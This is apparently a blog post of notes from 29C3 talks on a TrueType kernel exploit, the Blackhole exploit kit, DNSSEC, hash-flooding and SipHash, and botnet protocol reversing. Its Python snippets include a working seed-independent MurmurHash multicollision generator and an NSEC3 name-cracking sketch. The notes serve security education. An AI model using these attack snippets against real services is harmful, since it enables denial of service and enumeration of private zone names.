Miloslav Trmač: Notes from 29th Chaos Communication Congress

CVE-2011-3402 technical analysis

= embedded font with a kernel exploit.

Earliest use in 2010, discovered in Duqu in 2011; now a fully working exploit is used in the Cool and BlackHole exploit kits.
Font rendering: win32k.sys executes TrueType font programs in ring 0 (motivation per NT 4.0 documentation: "faster operation and reduced memory requirements").
"CVT" = array of point values (a "variable storage area")
The TrueType VM includes a function for merging bitmaps while offsetting them (to do kerning), which is missing a bounds check => used to set a single bit in the length of the CVT, making it possible to overwrite the global VM state which follows the CVT in memory. This is memory-layout independent: in the TTF VM code, there is a loop that flips a bit in the global state and searches for a CVT offset through which the change is visible => uses the TTF VM to help with the exploit!
Then the VM code overwrites a function pointer in the global data (which is supposed to point to one of 6 predefined rounding functions).
The TrueType implementation (probably?) hasn't changed over the years => the structure layout hasn't changed either.
All memory accesses are relative, the VM loop detects a precise offset => ASLR doesn't help.
Font metadata in exploit: "copyright 2003 showtime inc. dexter regular" (reference to a TV show?).
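
The "flip a bit and search for the offset" idea can be modeled in a few lines. This is only a toy simulation on a Python list, not the real win32k.sys layout: the class `ToyFontVM`, the `gap` parameter, the flag toggle and the "rounding slot" are all hypothetical stand-ins chosen for illustration.

```python
class ToyFontVM:
    """Toy model only: a CVT and the VM's global state share one flat word array."""

    MEM_WORDS = 256

    def __init__(self, cvt_len: int, gap: int):
        self.mem = [0] * self.MEM_WORDS
        self.cvt_len = cvt_len            # bound enforced on CVT accesses
        self._state_base = cvt_len + gap  # not known to the "font program"

    def _check(self, index: int) -> None:
        if not 0 <= index < self.cvt_len:
            raise IndexError("CVT index out of range")

    def read_cvt(self, index: int) -> int:
        self._check(index)
        return self.mem[index]

    def write_cvt(self, index: int, value: int) -> None:
        self._check(index)
        self.mem[index] = value

    def toggle_state_flag(self) -> None:
        # Stand-in for a legitimate instruction that changes global state.
        self.mem[self._state_base] ^= 1

    def corrupt_length(self, bit: int) -> None:
        # Stand-in for the missing bounds check: one bit set in the CVT length.
        self.cvt_len |= 1 << bit

    def rounding_slot(self) -> int:
        # Stand-in for the function pointer stored in the global state.
        return self.mem[self._state_base + 1]


def find_state_offset(vm: ToyFontVM):
    """Scan CVT indices for the one through which a state change is visible."""
    for index in range(vm.cvt_len):
        before = vm.read_cvt(index)
        vm.toggle_state_flag()
        changed = vm.read_cvt(index) != before
        vm.toggle_state_flag()  # restore the original flag value
        if changed:
            return index
    return None
```

Because the search only uses CVT-relative indices, the toy "font program" never needs an absolute address, which is the same reason ASLR does not help in the notes above.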

A note from the lightning talks

"Help a reporter out": You can give an interview on anything if a reporter needs last-minute experts = advertising for free.

Analytical summary of the Blackhole exploit kit

~12 PHP scripts that tie together various exploits, together with reporting/management UI
PHP => platform independent (also requires MySQL, IonCube)
It seems that many of the exploits were written by someone else, and (based on a public argument) rented (and unpaid) rather than purchased (eventually dropped in 2.0, replaced by other exploits).
"Cool exploit kit" very similar - ripped off Blackhole, or a new brand by the same author?
There is a tool for brute-forcing Blackhole admin passwords :) => Blackhole added a captcha
Author? "Paunch" There is public contact info / live tech support contact, and a public fee schedule, e.g. $1500/year.
Source code was leaked == copied from a running server; some files missing, IonCube-obfuscated.
Exploit URL: used to be .../main.php?id=[md5 of time of exploit run] ... nowadays a little more randomized, but most of the content is always the same, with various strings unique to the exploit.

Overview of secure name resolution

Largely an overview of various approaches.

UDP spoofing: need to guess source port, transaction ID (~31 bits) => difficult for "write-only" attackers, but a local attacker that can read the requests can do it easily enough.
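
To get a feeling for the ~31 bits, here is a small back-of-the-envelope calculation. It assumes (a simplification not taken from the talk) that every forged response is an independent, uniformly random guess of port and transaction ID; the function name is made up for this note.

```python
import math


def spoof_success_probability(forged_packets: int, entropy_bits: int = 31) -> float:
    """Chance that at least one blind guess matches port + transaction ID."""
    p_single = 2.0 ** -entropy_bits
    # 1 - (1 - p)^n, computed via log1p/expm1 to stay accurate for tiny p.
    return -math.expm1(forged_packets * math.log1p(-p_single))
```

Under these assumptions a blind attacker needs on the order of 2^30 forged packets for a roughly 40% chance, while an attacker who can read the request needs exactly one.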

DNSSEC:

Signs records, not responses, but NXDOMAIN isn't a record => signed NSEC response "no names between A1 and A2", which allows zone disclosure => NSEC3: "no names between hashes H1 and H2" => an attacker gets the hashes of all names and needs an (off-line) dictionary attack to recover the names.
No existing OS stub resolver does validation (Windows interprets results by a DNS recursive resolver, but that's all).
Failures look like general DNS errors, user can't override them; providers blamed->Comcast is maintaining a list of failures to ignore.
Depends on accurate time->DoS risk, and NTP pools depend on DNS.
DoS amplification, but countermeasures exist.
ISP wild-card redirect: still possible for a TLD operator (Verisign), or when the ISP is validating for the user.
Root zone trust: Verisign has the zone key, this is signed by an ICANN key, which has 4 HSMs with copies, authenticated with 3/7 smart cards -> 3/7 physical keys
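
The off-line dictionary attack on NSEC3 mentioned above can be sketched as follows. The hash is my reading of the NSEC3 construction (iterated, salted SHA-1 over the wire-format name, printed in base32hex); the function names, the word list and the zone are illustrative assumptions, and IDN handling is ignored.

```python
import base64
import hashlib

_B32 = b"ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"
_B32HEX = b"0123456789abcdefghijklmnopqrstuv"
_TO_B32HEX = bytes.maketrans(_B32, _B32HEX)


def wire_name(name: str) -> bytes:
    """Lower-cased DNS wire format: length-prefixed labels plus the root label."""
    labels = [label for label in name.lower().rstrip(".").split(".") if label]
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def nsec3_hash(name: str, salt: bytes, iterations: int) -> str:
    """Salted SHA-1, re-hashed `iterations` additional times, as base32hex."""
    digest = hashlib.sha1(wire_name(name) + salt).digest()
    for _ in range(iterations):
        digest = hashlib.sha1(digest + salt).digest()
    return base64.b32encode(digest).translate(_TO_B32HEX).decode("ascii")


def dictionary_attack(observed_hashes, zone, salt, iterations, wordlist):
    """Map each observed NSEC3 hash to a guessed name, where a guess matches."""
    found = {}
    for word in wordlist:
        candidate = f"{word}.{zone}"
        digest = nsec3_hash(candidate, salt, iterations)
        if digest in observed_hashes:
            found[digest] = candidate
    return found
```

Salt and iteration count are published in the zone, so they slow the attacker down but are not secrets; names that are not in the word list stay hidden.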

DNSCurve: on-line signatures, forwarders impossible. All 300 root servers would have to have the private key (ICANN doesn't want this); higher CPU load requirements.

Namecoin=modified Bitcoin, with every client having a full name database (=> crazy?)

EMV walkthrough

For connecting a smartcard reader, use PC/SC; you don't need a specialized "EMV" reader - it's all ISO 7816.

Nothing new otherwise, just a walkthrough through the publicly available EMV standard.

Hash-flooding DoS reloaded attacks and defenses

Attack first suggested in 1998 by Solar Designer in Phrack. Published in 2003 at USENIX. Another publication in 2011.

Possible countermeasures:

Use a "safe" structure, e.g. a balanced tree, for handling collisions.
Just discard cache entries that would cause a large collision list (if discarding data is OK).
Not: use SHA-3: a) it's slow, b) it doesn't work - SHA-3 is collision resistant, but (SHA-3 mod (small hash table size)) is not collision resistant.
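
The SHA-3 point is easy to check: once the digest is reduced to a bucket index, plain brute force finds as many same-bucket keys as wanted. A minimal sketch, assuming an unkeyed table that maps keys with `digest mod table_size` (the key format `key<N>` and the function names are made up):

```python
import hashlib


def bucket(key: bytes, table_size: int) -> int:
    """Bucket index of a hash table that uses SHA-3 reduced modulo its size."""
    digest = hashlib.sha3_256(key).digest()
    return int.from_bytes(digest, "big") % table_size


def same_bucket_keys(target_bucket: int, table_size: int, count: int):
    """Brute-force `count` distinct keys that all land in one bucket."""
    hits = []
    counter = 0
    while len(hits) < count:
        key = b"key%d" % counter
        if bucket(key, table_size) == target_bucket:
            hits.append(key)
        counter += 1
    return hits
```

On average this needs about `table_size` attempts per colliding key, so for a table with 1024 buckets a few thousand hash evaluations per key are enough, no matter how strong the underlying hash is.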

Common response: use an application-specific secret key to randomize the hash function

MurmurHash 2: block processing is independent of seed value; the state is set to seed, then updated by incoming data => we can create pairs of input blocks that cancel each other WRT the hash state => for 16n bytes, can create 2ⁿ collisions, irrespective of the secret seed.

MurmurHash 3 (introduced as a response to the attack): we can do the same thing.
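
The seed-independent collisions can be reproduced with a short script. This is my own reconstruction, not the speakers' code: it assumes the 64-bit MurmurHash 2 variant (MurmurHash64A, 8-byte blocks, so one colliding pair is 16 bytes), handles only inputs that are a multiple of 8 bytes, and uses a top-bit difference that survives multiplication by the odd constant. Requires Python 3.8+ for the modular inverse.

```python
import itertools
import struct

MASK = (1 << 64) - 1
M = 0xC6A4A7935BD1E995
R = 47
M_INV = pow(M, -1, 1 << 64)  # M is odd, so it is invertible mod 2^64
TOP_BIT = 1 << 63


def mix(k: int) -> int:
    """Per-block transformation; note that it does not depend on the seed."""
    k = (k * M) & MASK
    k ^= k >> R
    return (k * M) & MASK


def unmix(k: int) -> int:
    """Inverse of mix(): the xor-shift by 47 bits is its own inverse."""
    k = (k * M_INV) & MASK
    k ^= k >> R
    return (k * M_INV) & MASK


def murmur64a(data: bytes, seed: int) -> int:
    """MurmurHash64A-style hash for inputs that are a multiple of 8 bytes."""
    assert len(data) % 8 == 0, "tail handling omitted in this sketch"
    h = (seed ^ (len(data) * M)) & MASK
    for (k,) in struct.iter_unpack("<Q", data):
        h ^= mix(k)
        h = (h * M) & MASK
    h ^= h >> R
    h = (h * M) & MASK
    h ^= h >> R
    return h


def colliding_pair(a: int, b: int):
    """Two 16-byte strings whose effect on the hash state is identical."""
    first = struct.pack("<QQ", a, b)
    second = struct.pack("<QQ", unmix(mix(a) ^ TOP_BIT), unmix(mix(b) ^ TOP_BIT))
    return first, second


def multicollisions(n: int):
    """2^n distinct strings of 16*n bytes that collide for every seed."""
    pair = colliding_pair(0x0123456789ABCDEF, 0xFEDCBA9876543210)
    return [b"".join(choice) for choice in itertools.product(pair, repeat=n)]
```

Flipping the top bit of the first mixed block turns into a top-bit difference in the state (xor and addition agree on that bit, and multiplying by an odd number keeps it), and the second block flips it back. Since this holds for any state, the secret seed never enters the argument.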

Trying this attack:

on Rails: need the string to pass some format checks, can just brute-force for acceptable values. For www-form-urlencoded data, Rails limits the total number of parameters => safe, but JSON data is not protected. Lesson: patching this kind of vulnerability in applications doesn't work: too much code, too many opportunities for loopholes.
on Java: the only issue is that you need to construct "char" (16-bit) character strings.

Both cases reported, with CVEs [what about other languages?] http://emboss.github.com/blog. Reactions: No response from Java; The Ruby problem was fixed in cruby, jruby, rubinius.

Possible fixes:

"Don't use MurmurHash"?
- CityHash: even weaker than MurmurHash - can find more collisions for the same
  length of string.
- Python's hash(): a little better than MurmurHash, but still not good: uses hash input as a key to encrypt the seed, takes this as a hash result; so if we can see the hash value, we can just decrypt the value to get the seed - and randomization is optional anyway.
- Marvin32 (.NET): no results for now, looking at it
Introduced SipHash: "fast short-input PRF". https://131002.net/siphash/
- rigorous security analysis (peer-reviewed research paper).
- 256-bit state, 128-bit key. Can use an
  arbitrary number of "rounds" for compression, or for finalization =>
  SipHash-X-Y naming. Proposing SipHash-2-4 for general use.
- Strength claims: ~2¹²⁸ key recovery, ~2¹⁹² state recovery, ~2¹²⁸ "internal-collision forgery". With ~2^s effort, the probability of forgery is 2^(s-64).
- ~120-200 cycles for 8-64 byte inputs, 1.44 cycles/byte for long messages
  => < 2x slower than CityHash, SpookyHash.
- 18 third-party implementations in 8 days already.
- Now used in Perl 5, cruby, jruby, others
Why not use other cryptographic hashes? SHA-3 is much slower than SipHash. "Blake" is 2-3x slower than SipHash.
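
For reference, a compact pure-Python sketch of SipHash-c-d as I understand the published description (four 64-bit words of state, a 128-bit key, `c` compression rounds per 8-byte word and `d` finalization rounds). It is meant to show the structure, not to be fast; use a vetted implementation for anything real.

```python
import struct

MASK = 0xFFFFFFFFFFFFFFFF


def _rotl(x: int, bits: int) -> int:
    return ((x << bits) | (x >> (64 - bits))) & MASK


def _sipround(v0, v1, v2, v3):
    v0 = (v0 + v1) & MASK
    v1 = _rotl(v1, 13) ^ v0
    v0 = _rotl(v0, 32)
    v2 = (v2 + v3) & MASK
    v3 = _rotl(v3, 16) ^ v2
    v0 = (v0 + v3) & MASK
    v3 = _rotl(v3, 21) ^ v0
    v2 = (v2 + v1) & MASK
    v1 = _rotl(v1, 17) ^ v2
    v2 = _rotl(v2, 32)
    return v0, v1, v2, v3


def siphash(key: bytes, msg: bytes, c: int = 2, d: int = 4) -> int:
    """SipHash-c-d of msg under a 16-byte key; defaults give SipHash-2-4."""
    if len(key) != 16:
        raise ValueError("key must be 16 bytes")
    k0, k1 = struct.unpack("<QQ", key)
    v0 = k0 ^ 0x736F6D6570736575
    v1 = k1 ^ 0x646F72616E646F6D
    v2 = k0 ^ 0x6C7967656E657261
    v3 = k1 ^ 0x7465646279746573
    # Zero-pad to a multiple of 8; the last byte carries len(msg) mod 256.
    padded = msg + b"\x00" * (7 - len(msg) % 8) + bytes([len(msg) & 0xFF])
    for (word,) in struct.iter_unpack("<Q", padded):
        v3 ^= word
        for _ in range(c):
            v0, v1, v2, v3 = _sipround(v0, v1, v2, v3)
        v0 ^= word
    v2 ^= 0xFF
    for _ in range(d):
        v0, v1, v2, v3 = _sipround(v0, v1, v2, v3)
    return v0 ^ v1 ^ v2 ^ v3
```

A hash table would draw `key` randomly at process start and use `siphash(key, s) % table_size` as the bucket index; unlike the MurmurHash seed, the key influences every round, so the block-cancelling trick above has nothing to hold on to.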

The future of protocol reversing and simulation applied on ZeroAccess botnet

Introduces "Netzob":

Infers protocol "vocabulary" and "grammar"
Can simulate a client/server/fuzzing
Can export the analyzed protocol in various formats, including a Wireshark dissector.

ZeroAccess botnet: 2 ways to gain money: click fraud and bitcoin mining

Protocol inference:

Split messages to fields:
- Find fixed-width fixed/variable fields
- Find delimiter-based fields
- "Sequence alignment" - find maximal-length common sequences (=> maximal-length fixed fields) for the sample, then convert into a regexp.
- Supports hierarchical message format, with each level using a different
  method
Cluster similar messages. Similarity = "ratio of dynamic fields / bytes", "ratio of common dynamic bytes". Use UPGMA hierarchical clustering.
Find values that vary depending on context (IP address, time, ...)
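
The "sequence alignment => regexp" step can be illustrated for two messages with the standard library. This is only a stand-in: `difflib.SequenceMatcher` is not the alignment algorithm Netzob uses, and the function names, the `min_len` cut-off and the sample messages are assumptions for this sketch.

```python
import re
from difflib import SequenceMatcher


def static_segments(a: bytes, b: bytes, min_len: int = 3):
    """Common byte runs of two messages, in order; short runs are treated as noise."""
    matcher = SequenceMatcher(None, a, b, autojunk=False)
    return [
        a[m.a:m.a + m.size]
        for m in matcher.get_matching_blocks()
        if m.size >= min_len
    ]


def to_regex(segments):
    """Static segments become literals, everything between them a dynamic field."""
    body = b"(.*?)".join(re.escape(segment) for segment in segments)
    return re.compile(b"(.*?)" + body + b"(.*)", re.DOTALL)


if __name__ == "__main__":
    first = b"GET /index.html HTTP/1.1\r\n"
    second = b"GET /img/logo.png HTTP/1.1\r\n"
    pattern = to_regex(static_segments(first, second))
    print(pattern.pattern)
    print(pattern.fullmatch(second).groups())
```

The capture groups are the candidate dynamic fields; a real tool would align the whole sample set rather than a single pair and then refine each field with the other methods listed above.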

Encoding (XOR, ASN.1), encryption: can define transformation functions, and add more functions; apparently must be selected manually.

Finding field relations automatically: Try various transformations of a field (or a field combination), then use "maximal information coefficient" for finding correlated values. Includes environmental context as possible information sources.

Protocol rules: collect message sequences => build automata (with probability, reaction time on arcs). Then Angluin L*a to infer a grammar.
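
The first half of this step (message sequences => automaton with probabilities on the arcs) can be sketched as a simple transition count. This is a deliberate simplification: it builds a first-order model over already-classified message symbols, leaves out reaction times, and does not implement the Angluin-style inference; the symbol names in the usage example are invented.

```python
from collections import Counter, defaultdict


def build_automaton(sessions):
    """Estimate arc probabilities from observed sequences of message symbols."""
    counts = defaultdict(Counter)
    for session in sessions:
        previous = "START"
        for symbol in session:
            counts[previous][symbol] += 1
            previous = symbol
        counts[previous]["END"] += 1
    return {
        state: {nxt: n / sum(successors.values()) for nxt, n in successors.items()}
        for state, successors in counts.items()
    }


if __name__ == "__main__":
    observed = [
        ["HELLO", "ACK", "DATA", "BYE"],
        ["HELLO", "ACK", "BYE"],
        ["HELLO", "ERR"],
    ]
    for state, arcs in build_automaton(observed).items():
        print(state, arcs)
```

Such a passively learned model only covers what was seen in the captures; an active learner can additionally send chosen queries to the live implementation to fill in the gaps.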

There is a GUI to help with all of this, interactively naming fields / changing display format and the like.

Miloslav Trmač

Friday, January 4, 2013

Notes from 29th Chaos Communication Congress – day 3